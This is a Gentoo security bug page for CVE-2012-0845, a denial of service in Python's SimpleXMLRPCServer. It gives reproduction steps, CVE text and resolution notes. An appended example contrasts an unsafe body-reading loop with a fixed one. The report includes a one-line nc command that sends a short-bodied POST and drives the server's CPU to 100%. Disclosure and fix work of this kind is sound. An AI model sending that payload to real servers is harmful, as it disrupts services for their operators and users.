Bug 403437 (CVE-2012-0845) - <dev-lang/python-{2.6.8,2.7.3-r1,3.1.5,3.2.3}: DoS by processing malformed XMLRPC / HTTP POST request (CVE-2012-0845)
Alias: CVE-2012-0845
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
Importance: Normal normal
Assignee: Gentoo Security
Whiteboard: A3 [glsa]
Reported: 2012-02-13 17:26 UTC by Agostino Sarubbo
Modified: 2014-01-06 21:28 UTC

Description Agostino Sarubbo gentoo-dev 2012-02-13 17:26:41 UTC
A denial of service flaw was found in the way the Simple XML-RPC Server module of Python processed client connections that were closed before the complete request body had been received. A remote attacker could use this flaw to cause a Python Simple XML-RPC based server process to consume an excessive amount of CPU.

Issue reported by Daniel Callaghan


Steps to reproduce:
A) for v3.2.2 version:

1) start server:

from xmlrpc.server import SimpleXMLRPCServer
server = SimpleXMLRPCServer(('', 12345))
server.serve_forever()  # without this call the listener never handles the request

2) # top

3) issue request from client:
echo -e 'POST /RPC2 HTTP/1.0\r\nContent-Length: 100\r\n\r\nlol bye' | nc localhost 12345

Return to the 'top' screen and see how CPU consumption on the particular host quickly moves to 100%.

B) for v2.7.2 version:

1) start server:


from SimpleXMLRPCServer import SimpleXMLRPCServer
server = SimpleXMLRPCServer(('', 12345))
server.serve_forever()  # without this call the listener never handles the request

Steps 2) and 3) for v2.7.2 version are identical to those for v3.2.2 version.
Comment 2 GLSAMaker/CVETool Bot gentoo-dev 2012-10-07 23:16:17 UTC
CVE-2012-0845: SimpleXMLRPCServer in Python before 2.6.8, 2.7.x
  before 2.7.3, 3.x before 3.1.5, and 3.2.x before 3.2.3 allows remote
  attackers to cause a denial of service (infinite loop and CPU consumption)
  via an XML-RPC POST request that contains a smaller amount of data than
  specified by the Content-Length header.
Comment 3 GLSAMaker/CVETool Bot gentoo-dev 2014-01-06 21:28:13 UTC
This issue was resolved and addressed in GLSA 201401-04 by GLSA coordinator Sergey Popov (pinkbyte).
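
The condition described in Comment 2 (a POST body shorter than its Content-Length), shown as an added example that is not part of the bug report or Python's own source: a body reader that trusts the header beside one that stops on an empty read. The function names, `MAX_CHUNK` and the `max_spins` demo guard are assumptions made for illustration.

```python
import io

MAX_CHUNK = 10 * 1024 * 1024  # assumed per-read cap, not taken from the bug report


def read_body_unchecked(rfile, content_length, max_spins=1000):
    """Trusts Content-Length. max_spins exists only so this demo terminates."""
    remaining, parts, spins = content_length, [], 0
    while remaining:
        chunk = rfile.read(min(remaining, MAX_CHUNK))
        parts.append(chunk)
        remaining -= len(chunk)  # at EOF chunk is b"", so remaining never shrinks
        spins += 1
        if spins >= max_spins:
            return b"".join(parts), spins, False
    return b"".join(parts), spins, True


def read_body_checked(rfile, content_length):
    """Same loop, but an empty read (peer closed early) ends it."""
    remaining, parts, reads = content_length, [], 0
    while remaining:
        chunk = rfile.read(min(remaining, MAX_CHUNK))
        reads += 1
        if not chunk:  # EOF before Content-Length bytes arrived
            break
        parts.append(chunk)
        remaining -= len(chunk)
    return b"".join(parts), reads, remaining == 0


# Constructed input: the 8-byte body from the report's request, declared as 100.
SHORT_BODY = b"lol bye\n"
DECLARED = 100


def demo():
    _, spins, finished = read_body_unchecked(io.BytesIO(SHORT_BODY), DECLARED)
    body, reads, complete = read_body_checked(io.BytesIO(SHORT_BODY), DECLARED)
    return spins, finished, body, reads, complete


if __name__ == "__main__":
    spins, finished, body, reads, complete = demo()
    print(f"unchecked: cut off by demo guard after {spins} reads, finished={finished}")
    print(f"checked:   {reads} reads, {len(body)} bytes, complete={complete}")
```

A caller of the checked reader should treat `complete == False` as a malformed request and reject it rather than parse the partial body.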